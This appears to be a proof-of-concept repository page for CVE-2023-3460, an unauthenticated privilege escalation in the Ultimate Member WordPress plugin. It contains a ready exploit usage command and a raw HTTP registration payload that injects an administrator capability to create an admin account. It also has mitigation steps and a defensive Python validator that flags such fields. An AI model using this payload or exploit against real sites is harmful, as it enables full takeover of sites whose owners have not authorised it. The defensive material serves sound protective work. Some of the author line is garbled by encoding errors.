CVE-2023-3460 PoC — Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation

Associated Vulnerability

Title: Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation (CVE-2023-3460)

Description: The Ultimate Member WordPress plugin before 2.6.7 does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.
Readme

# 🚨 CVE-2023-3460 - WordPress Ultimate Member Privilege Escalation Exploit

This is a proof-of-concept (PoC) exploit for [CVE-2023-3460](https://nvd.nist.gov/vuln/detail/CVE-2023-3460), a critical vulnerability in the WordPress plugin **Ultimate Member**. It allows **unauthenticated users** to escalate their privileges to **Administrator** by crafting a malicious registration request.

> 🔥 **Impact:** Full site compromise through unauthorized admin account creation.

---

## 📌 Vulnerability Details

- **Plugin Affected:** Ultimate Member
- **Affected Versions:** ≤ 2.6.6
- **Fixed Version:** 2.6.7
- **Exploit Type:** Privilege Escalation via Registration Abuse
- **Authentication Required:** ❌ No
- **CVE:** [CVE-2023-3460](https://nvd.nist.gov/vuln/detail/CVE-2023-3460)

---

## ⚙️ Requirements

- Python 3
- `requests` library

Install requirements:

```bash
pip3 install requests
```

---

## 🧪 Exploit Usage

```bash
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> -e <EMAIL>
```

### ✅ Example:

```bash
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 -e pwn@evil.com
```

---

## 📥 Exploit Script Features

- Fetches CSRF nonce (`_wpnonce`) from the register page
- Bypasses form validation
- Injects `wp_capabilities` with `administrator` role
- Creates a new admin user without authentication

---

## 🔍 Sample Exploit Payload

```http
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
user_email=pwn@evil.com&
user_password=Pass@123&
wp_capabilities[administrator]=1&
_um_nonce=<nonce_value>
```

---

## 🛡️ Mitigation

- Update Ultimate Member plugin to **v2.6.7** or above
- Disable open registration if not required
- Monitor user creation logs for suspicious activity
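A defensive counterpart to the last two bullets, added here as an illustration and not part of this PoC or of the Ultimate Member plugin: an allowlist validator for registration form bodies that rejects every field outside the expected sign-up fields and separately flags keys that would write role or capability user meta (such as the `wp_capabilities` key shown in the sample payload above), so a gateway or plugin hook can block and alert on them. The allowed field names and the sample bodies are assumptions constructed for the example.

```python
from urllib.parse import parse_qs

# Fields a public registration form is expected to submit (assumed set,
# modelled on the form fields that appear in this README).
ALLOWED_FIELDS = {"user_login", "user_email", "user_password", "_um_nonce"}

# Meta keys that confer privileges and must never be accepted from a visitor.
# WordPress sites may use a table prefix other than "wp_", so match the suffix.
PRIVILEGED_KEYS = {"role", "roles"}
PRIVILEGED_SUFFIXES = ("capabilities", "user_level")


def base_key(field: str) -> str:
    """Strip an array index and fold case: 'wp_capabilities[administrator]' -> 'wp_capabilities'."""
    return field.split("[", 1)[0].strip().lower()


def is_privileged_key(field: str) -> bool:
    """True if the field would write a role or capability meta key."""
    key = base_key(field)
    return key in PRIVILEGED_KEYS or key.endswith(PRIVILEGED_SUFFIXES)


def check_registration_body(body: str) -> dict:
    """Validate a raw application/x-www-form-urlencoded registration body.

    Allowlisting means any unexpected key is rejected no matter how it is
    spelled; privileged keys are reported separately so they can be alerted on.
    """
    params = parse_qs(body, keep_blank_values=True)
    rejected = sorted(f for f in params if base_key(f) not in ALLOWED_FIELDS)
    privileged = [f for f in rejected if is_privileged_key(f)]
    return {"ok": not rejected, "rejected": rejected, "privileged": privileged}


# Constructed sample bodies: a normal sign-up and the payload shape from this README.
BENIGN_BODY = "user_login=alice&user_email=alice%40example.org&user_password=S3cret&_um_nonce=abc123"
MALICIOUS_BODY = ("user_login=pwnadmin&user_email=pwn%40evil.com&user_password=Pass%40123"
                  "&wp_capabilities[administrator]=1&_um_nonce=abc123")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        print(label, check_registration_body(body))
```

A rejected body with a non-empty `privileged` list is the event worth logging and alerting on, since no legitimate registration form submits those keys.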

---

## 📚 References

- 🔗 [Patchstack Advisory](https://patchstack.com/database/vulnerability/ultimate-member/wordpress-ultimate-member-plugin-2-6-6-authenticated-privilege-escalation-vulnerability)
- 🔗 [CVE-2023-3460 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-3460)

---

## ⚠️ Disclaimer

This script is provided for **educational and authorized testing purposes only**. Unauthorized exploitation of systems is illegal and unethical. Use it **only** on systems you own or have permission to test.

---

## πŸ‘¨β€πŸ’» Author

- πŸ’€ [GURJOT SINGH]
- πŸ”’ [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
File Snapshot

[4.0K] /data/pocs/9c7688bdcce13920444eaf4102ee24f068dcaf1c β”œβ”€β”€ [3.5K] CVE-2023-3460.py └── [2.4K] README.md 0 directories, 2 files